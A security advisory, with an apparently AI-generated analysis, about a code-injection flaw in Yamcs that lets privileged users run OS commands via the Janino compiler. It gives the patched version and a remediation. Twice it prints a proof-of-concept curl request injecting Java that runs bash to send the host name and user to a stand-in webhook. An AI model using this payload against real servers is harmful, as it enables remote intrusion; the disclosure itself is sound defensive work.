Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`
Description
Summary
A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.
Proof of
Concept (PoC) The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.
Prerequisites: 1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime). 2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
Steps to Reproduce:
- Send an authenticated HTTP
PATCHrequest to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g.,copySunsensor). The payload usesjava.lang.Runtimeto execute a reverse shell or ping an external webhook.
curl -i -X PATCH \
'http://:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
-d '{
"action": "SET",
"algorithm": {
"text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https:///$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
}
}'
- Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the
simulator.pyscript to generate sun sensor data). - The Yamcs server uses the Janino
SimpleCompilerto compile the injected text into a Java class on the fly. Since no restrictiveClassLoaderis applied, the payload is successfully compiled and executed. - Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.
Impact
This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.
Credits
Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2026-44632 is a critical Server-Side Code Injection vulnerability in Yamcs allowing authenticated users with ChangeMissionDatabase privilege to achieve RCE via Janino compiler with no sandboxing.
Vulnerability
A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory) in versions prior to 5.12.7. The application dynamically compiles and evaluates user-controlled algorithm text using the Janino SimpleCompiler without enforcing a restrictive ClassLoader or sandbox. An authenticated user with the ChangeMissionDatabase privilege can provide arbitrary Java code that is compiled and executed on the fly.
Exploitation
An attacker must have an active authentication token for a user holding the SystemPrivilege.ChangeMissionDatabase privilege and access to a running Yamcs instance with an active processor. The exploit sends an authenticated HTTP PATCH request to the MDB override endpoint (e.g., /api/mdb/myproject/realtime/algorithms/myproject/copySunsensor) with a JSON payload containing a malicious algorithm.text field. This injected text uses Java classes such as java.lang.Runtime.getRuntime().exec() to execute OS commands. The algorithm is then triggered by sending telemetry data that the algorithm depends on, causing the server to compile and execute the payload.
Impact
Successful exploitation results in Remote Code Execution (RCE) on the underlying host operating system. The attacker can execute arbitrary OS commands with the privileges of the Yamcs server process, leading to full system compromise, data exfiltration, or further lateral movement within the network [1][2].
Mitigation
The vulnerability is fixed in Yamcs version 5.12.7. Users should upgrade to this or a later release immediately [1][2]. No official workaround has been published, but restricting the ChangeMissionDatabase privilege to only trusted users can reduce the attack surface. There is no indication this CVE is listed on the CISA Known Exploited Vulnerabilities (KEV) catalog at the time of writing.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.yamcs:yamcs-coreMaven | < 5.12.7 | 5.12.7 |
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing sandbox restriction in the Janino-based algorithm evaluation engine allows user-controlled Java code to be compiled and executed without limitation."
Attack vector
An authenticated attacker with the `SystemPrivilege.ChangeMissionDatabase` privilege sends a crafted HTTP `PATCH` request to the MDB override endpoint (e.g., `/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor`) [ref_id=1][ref_id=2]. The request body contains a malicious algorithm text that invokes `java.lang.Runtime.getRuntime().exec()` to execute arbitrary OS commands [ref_id=2]. When the Yamcs server later evaluates the algorithm (triggered by incoming telemetry data), the Janino `SimpleCompiler` compiles the injected text on the fly without a secure sandbox, executing the payload on the host operating system [ref_id=2].
Affected code
The vulnerability resides in `org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`, the algorithm evaluation engine that uses the Janino `SimpleCompiler` to dynamically compile and evaluate user-controlled algorithm text [ref_id=1][ref_id=2]. No restrictive `ClassLoader` or sandbox is applied during compilation, allowing arbitrary Java code to be executed [ref_id=2].
What the fix does
The advisory states that versions prior to 5.12.7 are affected, but no patch diff is included in the bundle [ref_id=1]. The recommended remediation is to restrict the Janino compiler with a secure `ClassLoader` or sandbox that prevents access to dangerous classes like `java.lang.Runtime`, or to disallow dynamic algorithm text from untrusted users entirely [ref_id=2].
Preconditions
- authAttacker must possess a valid authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
- networkA running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime) must be reachable.
- networkThe attacker must be able to send HTTP requests to the Yamcs REST API endpoint (typically port 8090).
- inputThe algorithm must be triggered by incoming telemetry data after the malicious text is injected.
Reproduction
1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint with a malicious algorithm text payload: `curl -i -X PATCH 'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' -H 'Content-Type: application/json' -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' -d '{"action": "SET", "algorithm": {"text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"}}'` [ref_id=2]. 2. Trigger algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running `simulator.py` to generate sun sensor data) [ref_id=2]. 3. Verify command execution by checking for an incoming HTTP request on the provided webhook URL [ref_id=2].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.